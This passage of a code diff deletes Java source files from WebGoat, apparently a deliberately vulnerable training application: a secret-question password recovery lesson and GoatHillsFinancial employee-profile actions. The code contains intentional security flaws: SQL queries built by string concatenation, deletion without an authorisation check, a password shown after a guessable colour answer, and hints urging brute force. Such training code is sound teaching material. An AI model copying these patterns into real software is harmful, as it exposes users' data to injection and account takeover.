-        tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2)
-                .setAlign("left"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-        t.addElement(tr);
-
-        TR row1 = new TR();
-        row1.addElement(new TD(new B(new StringElement("*Answer: "))));
-
-        Input input1 = new Input(Input.TEXT, COLOR, "");
-        row1.addElement(new TD(input1));
-        t.addElement(row1);
-
-        Element b = ECSFactory.makeButton("Submit");
-        t.addElement(new TR(new TD(b)));
-        ec.addElement(t);
-
-        return (ec);
-    }
-
-    protected Element doStage3(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new H1().addElement("Webgoat Password Recovery "));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
-        tr.addElement(new TH().addElement("For security reasons, please change your password immediately.")
-                .setColSpan(2).setAlign("left"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:"))))
-                .setAlign("left"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement(new StringElement("Username: " + USERNAME_RESPONSE)));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement(new StringElement("Color: " + COLOR_RESPONSE)));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement(new StringElement("Password: " + USERS.get(USERNAME_RESPONSE).toString())));
-        t.addElement(tr);
-
-        ec.addElement(t);
-
-        if (USERNAME_RESPONSE.equals("admin") && COLOR_RESPONSE.equals("green"))
-        {
-            makeSuccess(s);
-        }
-        else if (!USERNAME_RESPONSE.equals("webgoat") && USERS.containsKey(USERNAME_RESPONSE))
-        {
-            s.setMessage("Close. Now try to get the password of a privileged account.");
-        }
-        return ec;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String username = "";
-        String color = "";
-
-        color = s.getParser().getStringParameter(COLOR, "");
-
-        if (color.length() > 0)
-            STAGE = 2;
-        else
-            STAGE = 1;
-
-        if (USERS.size() == 0)
-        {
-            populateTables();
-        }
-
-        if (STAGE == 2)
-        {
-            color = s.getParser().getStringParameter(COLOR, "");
-
-            if (COLORS.get(USERNAME_RESPONSE).equals(color))
-            {
-                STAGE = 1;
-                COLOR_RESPONSE = color;
-                ec.addElement(doStage3(s));
-            }
-            else
-            {
-                s.setMessage("Incorrect response for " + USERNAME_RESPONSE + ". Please try again!");
-                ec.addElement(doStage2(s));
-            }
-        }
-        else if (STAGE == 1)
-        {
-            username = s.getParser().getStringParameter(USERNAME, "");
-
-            if (USERS.containsKey(username))
-            {
-                STAGE = 2;
-                USERNAME_RESPONSE = username;
-                ec.addElement(doStage2(s));
-            }
-            else
-            {
-                if (username.length() > 0)
-                {
-                    s.setMessage("Not a valid username. Please try again.");
-                }
-                ec.addElement(doStage1(s));
-            }
-        }
-        else
-        {
-            ec.addElement(doStage1(s));
-            STAGE = 1;
-        }
-
-        return ec;
-    }
-
-    /**
-     * Gets the category attribute of the ForgotPassword object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-
-        return Category.AUTHENTICATION;
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints.add("There is no lock out policy in place, brute force your way!");
-        hints.add("Try using usernames you might encounter throughout WebGoat.");
-        hints.add("There are only so many possible colors, can you guess one?");
-        hints.add("The administrative account is \"admin\"");
-
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(15);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Forgot Password");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java

@@ -1,330 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public abstract class DefaultLessonAction implements LessonAction
-{
-    // FIXME: We could parse this class name to get defaults for these fields.
-    private String lessonName;
-    private String actionName;
-
-    private GoatHillsFinancial lesson;
-
-    public DefaultLessonAction(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        this.lesson = lesson;
-        this.lessonName = lessonName;
-        this.actionName = actionName;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public abstract String getNextPage(WebSession s);
-
-    public GoatHillsFinancial getLesson()
-    {
-        return lesson;
-    }
-
-    public String getLessonName()
-    {
-        return lessonName;
-    }
-
-    public String getActionName()
-    {
-        return actionName;
-    }
-
-    public void setSessionAttribute(WebSession s, String name, Object value)
-    {
-        s.getRequest().getSession().setAttribute(name, value);
-    }
-
-    public void setRequestAttribute(WebSession s, String name, Object value)
-    {
-        s.getRequest().setAttribute(name, value);
-    }
-
-    public void removeSessionAttribute(WebSession s, String name)
-    {
-        s.getRequest().getSession().removeAttribute(name);
-    }
-
-    protected String getSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
-    {
-        String value = (String) s.getRequest().getSession().getAttribute(name);
-        if (value == null) { throw new ParameterNotFoundException(); }
-
-        return value;
-    }
-
-    protected boolean getBooleanSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
-    {
-        boolean value = false;
-
-        Object attribute = s.getRequest().getSession().getAttribute(name);
-        if (attribute == null)
-        {
-            throw new ParameterNotFoundException();
-        }
-        else
-        {
-            // System.out.println("Attribute " + name + " is of type " +
-            // s.getRequest().getSession().getAttribute(name).getClass().getName());
-            // System.out.println("Attribute value: " +
-            // s.getRequest().getSession().getAttribute(name));
-            value = ((Boolean) attribute).booleanValue();
-        }
-        return value;
-    }
-
-    protected int getIntSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
-    {
-        int value = -1;
-        String ss = (String) s.getRequest().getSession().getAttribute(name);
-        if (ss == null)
-        {
-            throw new ParameterNotFoundException();
-        }
-        else
-        {
-            try
-            {
-                value = Integer.parseInt(ss);
-            } catch (NumberFormatException nfe)
-            {
-            }
-        }
-
-        return value;
-    }
-
-    protected String getRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
-    {
-        String value = (String) s.getRequest().getAttribute(name);
-        if (value == null) { throw new ParameterNotFoundException(); }
-
-        return value;
-    }
-
-    protected int getIntRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
-    {
-        int value = -1;
-        String ss = (String) s.getRequest().getAttribute(name);
-        if (ss == null)
-        {
-            throw new ParameterNotFoundException();
-        }
-        else
-        {
-            try
-            {
-                value = Integer.parseInt(ss);
-            } catch (NumberFormatException nfe)
-            {
-            }
-        }
-
-        return value;
-    }
-
-    public int getUserId(WebSession s) throws ParameterNotFoundException
-    {
-        return getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
-    }
-
-    public String getUserName(WebSession s) throws ParameterNotFoundException
-    {
-        String name = null;
-
-        int employeeId = getUserId(s);
-        try
-        {
-            String query = "SELECT first_name FROM employee WHERE userid = " + employeeId;
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                if (answer_results.next()) name = answer_results.getString("first_name");
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting user name");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting user name");
-            e.printStackTrace();
-        }
-
-        return name;
-    }
-
-    public boolean requiresAuthentication()
-    {
-        // Default to true
-        return true;
-    }
-
-    public boolean isAuthenticated(WebSession s)
-    {
-        boolean authenticated = false;
-
-        try
-        {
-            authenticated = getBooleanSessionAttribute(s, getLessonName() + ".isAuthenticated");
-        } catch (ParameterNotFoundException e)
-        {
-        }
-
-        return authenticated;
-    }
-
-    public boolean isAuthorized(WebSession s, int employeeId, String functionId)
-    {
-        String employer_id = (String) s.getRequest().getSession()
-                .getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID);
-        // System.out.println("Authorizing " + employeeId + " for use of function: " + functionId +
-        // " having USER_ID = "
-        // + employer_id );
-        boolean authorized = false;
-
-        try
-        {
-            String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = "
-                    + employeeId + ") and functionid = '" + functionId + "'";
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                authorized = answer_results.first();
-
-                /*
-                 * User is validated for function, but can the user perform that function on the
-                 * specified user?
-                 */
-                if (authorized)
-                {
-                    authorized = isAuthorizedForEmployee(s, Integer.parseInt(employer_id), employeeId);
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error authorizing");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error authorizing");
-            e.printStackTrace();
-        }
-
-        // System.out.println("Authorized? " + authorized);
-        return authorized;
-    }
-
-    public boolean isAuthorizedForEmployee(WebSession s, int userId, int employeeId)
-    {
-        // System.out.println("Authorizing " + userId + " for access to employee: " + employeeId);
-        boolean authorized = false;
-
-        try
-        {
-            String query = "SELECT * FROM ownership WHERE employer_id = ? AND employee_id = ?";
-
-            try
-            {
-
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setInt(1, userId);
-                answer_statement.setInt(2, employeeId);
-                ResultSet answer_results = answer_statement.executeQuery();
-                authorized = answer_results.first();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error authorizing");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error authorizing");
-            e.printStackTrace();
-        }
-
-        return authorized;
-    }
-
-    protected void setStage(WebSession s, String stage)
-    {
-        getLesson().setStage(s, stage);
-    }
-
-    protected void setStageComplete(WebSession s, String stage)
-    {
-        getLesson().setStageComplete(s, stage);
-    }
-
-    protected String getStage(WebSession s)
-    {
-        return getLesson().getStage(s);
-    }
-
-    public String toString()
-    {
-        return getActionName();
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java

@@ -1,111 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class DeleteProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-        int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-
-        if (isAuthenticated(s))
-        {
-            deleteEmployeeProfile(s, userId, employeeId);
-
-            try
-            {
-                chainedAction.handleRequest(s);
-            } catch (UnauthenticatedException ue1)
-            {
-                // System.out.println("Internal server error");
-                ue1.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                // System.out.println("Internal server error");
-                ue2.printStackTrace();
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return GoatHillsFinancial.LISTSTAFF_ACTION;
-    }
-
-    public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
-    {
-        try
-        {
-            // Note: The password field is ONLY set by ChangePassword
-            String query = "DELETE FROM employee WHERE userid = " + employeeId;
-            // System.out.println("Query: " + query);
-            try
-            {
-                Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                    ResultSet.CONCUR_READ_ONLY);
-                statement.executeUpdate(query);
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error deleting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error deleting employee profile");
-            e.printStackTrace();
-        }
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java

@@ -1,115 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class EditProfile extends DefaultLessonAction
-{
-
-    public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-            int userId = getUserId(s);
-            int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-
-            Employee employee = getEmployeeProfile(s, userId, employeeId);
-            setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return GoatHillsFinancial.EDITPROFILE_ACTION;
-    }
-
-    public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setInt(1, subjectUserId);
-                ResultSet answer_results = answer_statement.executeQuery();
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java

@@ -1,161 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class FindProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-
-            String pattern = s.getParser().getRawParameter(GoatHillsFinancial.SEARCHNAME);
-
-            findEmployeeProfile(s, userId, pattern);
-
-            // Execute the chained Action if the employee was found.
-            if (foundEmployee(s))
-            {
-                try
-                {
-                    chainedAction.handleRequest(s);
-                } catch (UnauthenticatedException ue1)
-                {
-                    // System.out.println("Internal server error");
-                    ue1.printStackTrace();
-                } catch (UnauthorizedException ue2)
-                {
-                    // System.out.println("Internal server error");
-                    ue2.printStackTrace();
-                }
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        String page = GoatHillsFinancial.SEARCHSTAFF_ACTION;
-
-        if (foundEmployee(s)) page = GoatHillsFinancial.VIEWPROFILE_ACTION;
-
-        return page;
-    }
-
-    private boolean foundEmployee(WebSession s)
-    {
-        boolean found = false;
-        try
-        {
-            getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
-            found = true;
-        } catch (ParameterNotFoundException e)
-        {
-        }
-
-        return found;
-    }
-
-    public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException
-    {
-        Employee profile = null;
-        // Clear any residual employee id's in the session now.
-        removeSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setString(1, "%" + pattern + "%");
-                answer_statement.setString(2, "%" + pattern + "%");
-                ResultSet answer_results = answer_statement.executeQuery();
-
-                // Just use the first hit.
-                if (answer_results.next())
-                {
-                    int id = answer_results.getInt("userid");
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(id, answer_results.getString("first_name"), answer_results
-                            .getString("last_name"), answer_results.getString("ssn"),
-                            answer_results.getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */
-                    setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id));
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error finding employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error finding employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java

@@ -1,327 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.util.ArrayList;
-import java.util.Hashtable;
-import java.util.List;
-import java.util.Map;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.lessons.RandomLessonAdapter;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class GoatHillsFinancial extends RandomLessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    public final static String DESCRIPTION = "description";
-
-    public final static String DISCIPLINARY_DATE = "disciplinaryDate";
-
-    public final static String DISCIPLINARY_NOTES = "disciplinaryNotes";
-
-    public final static String CCN_LIMIT = "ccnLimit";
-
-    public final static String CCN = "ccn";
-
-    public final static String SALARY = "salary";
-
-    public final static String START_DATE = "startDate";
-
-    public final static String MANAGER = "manager";
-
-    public final static String ADDRESS1 = "address1";
-
-    public final static String ADDRESS2 = "address2";
-
-    public final static String PHONE_NUMBER = "phoneNumber";
-
-    public final static String TITLE = "title";
-
-    public final static String SSN = "ssn";
-
-    public final static String LAST_NAME = "lastName";
-
-    public final static String FIRST_NAME = "firstName";
-
-    public final static String PASSWORD = "password";
-
-    public final static String EMPLOYEE_ID = "employee_id";
-
-    public final static String USER_ID = "user_id";
-
-    public final static String SEARCHNAME = "search_name";
-
-    public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult";
-
-    public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee";
-
-    public final static String STAFF_ATTRIBUTE_KEY = "Staff";
-
-    public final static String LOGIN_ACTION = "Login";
-
-    public final static String LOGOUT_ACTION = "Logout";
-
-    public final static String LISTSTAFF_ACTION = "ListStaff";
-
-    public final static String SEARCHSTAFF_ACTION = "SearchStaff";
-
-    public final static String FINDPROFILE_ACTION = "FindProfile";
-
-    public final static String VIEWPROFILE_ACTION = "ViewProfile";
-
-    public final static String EDITPROFILE_ACTION = "EditProfile";
-
-    public final static String UPDATEPROFILE_ACTION = "UpdateProfile";
-
-    public final static String CREATEPROFILE_ACTION = "CreateProfile";
-
-    public final static String DELETEPROFILE_ACTION = "DeleteProfile";
-
-    public final static String ERROR_ACTION = "error";
-
-    private final static Integer DEFAULT_RANKING = new Integer(125);
-
-    private Map<String, LessonAction> lessonFunctions = new Hashtable<String, LessonAction>();
-
-    public GoatHillsFinancial()
-    {
-        String myClassName = parseClassName(this.getClass().getName());
-        registerActions(myClassName);
-    }
-
-    protected void registerActions(String className)
-    {
-        registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-        registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-        registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
-        // These actions are special in that they chain to other actions.
-        registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
-        registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
-        registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
-
-    protected final String parseClassName(String fqcn)
-    {
-        String className = fqcn;
-
-        int lastDotIndex = fqcn.lastIndexOf('.');
-        if (lastDotIndex > -1) className = fqcn.substring(lastDotIndex + 1);
-
-        return className;
-    }
-
-    protected void registerAction(LessonAction action)
-    {
-        lessonFunctions.put(action.getActionName(), action);
-    }
-
-    public String[] getStages()
-    {
-        return new String[] {};
-    }
-
-    protected List<String> getHints(WebSession s)
-    {
-        return new ArrayList<String>();
-    }
-
-    public String getInstructions(WebSession s)
-    {
-        return "";
-    }
-
-    protected LessonAction getAction(String actionName)
-    {
